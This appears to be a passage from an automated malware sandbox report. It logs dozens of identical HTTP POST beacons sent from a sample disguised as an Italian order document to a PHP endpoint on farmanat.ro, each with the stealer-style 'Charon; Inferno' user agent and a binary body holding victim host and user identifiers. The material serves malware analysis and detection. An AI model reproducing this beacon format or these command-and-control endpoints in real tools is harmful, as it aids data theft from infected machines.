                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              632192.168.11.2050477176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:29.843203068 CET7194OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:29.876607895 CET7194OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:29.926882029 CET7195INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              633192.168.11.2050478176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:30.308855057 CET7195OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:30.342288971 CET7196OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:30.405215025 CET7196INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              634192.168.11.2050479176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:30.786736012 CET7197OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:30.820492029 CET7197OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:30.869714975 CET7197INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              635192.168.11.2050480176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:31.296933889 CET7198OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:31.331038952 CET7198OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:31.403213978 CET7199INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              636192.168.11.2050481176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:31.808199883 CET7199OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:31.841713905 CET7200OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:31.902401924 CET7200INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              637192.168.11.2050482176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:32.331859112 CET7201OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:32.366100073 CET7201OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:32.417025089 CET7201INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              638192.168.11.2050483176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:32.797645092 CET7202OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:32.830811024 CET7202OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:32.903328896 CET7203INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              639192.168.11.2050484176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:33.325393915 CET7203OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:33.359611988 CET7204OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:33.412101984 CET7204INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              64192.168.11.2049900176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:41.968153000 CET6398OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:42.001996994 CET6398OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:42.053039074 CET6398INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              640192.168.11.2050485176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:33.845489979 CET7205OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:33.879756927 CET7205OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:33.935188055 CET7205INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              641192.168.11.2050486176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:34.266818047 CET7206OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:34.300400019 CET7206OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:34.350164890 CET7207INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:33 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              642192.168.11.2050487176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:34.777721882 CET7207OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:34.811966896 CET7208OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:34.861690998 CET7208INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:33 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              643192.168.11.2050488176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:35.308824062 CET7209OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:35.343022108 CET7209OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:35.395204067 CET7209INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              644192.168.11.2050489176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:35.762264967 CET7210OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:35.795502901 CET7210OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:35.844363928 CET7211INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              645192.168.11.2050490176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:36.258620024 CET7211OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:36.293025970 CET7212OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:36.343269110 CET7212INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              646192.168.11.2050491176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:36.772211075 CET7213OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:36.805632114 CET7213OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:36.854226112 CET7213INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              647192.168.11.2050492176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:37.268574953 CET7214OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:37.302251101 CET7214OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:37.351679087 CET7215INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:36 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              648192.168.11.2050493176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:37.770351887 CET7215OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:37.804538012 CET7215OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:37.854489088 CET7216INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:36 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              649192.168.11.2050494176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:38.269613981 CET7217OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:38.303894043 CET7217OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:38.353996992 CET7217INHTTP/1.1 404 Not Found
                                              Server: nginx
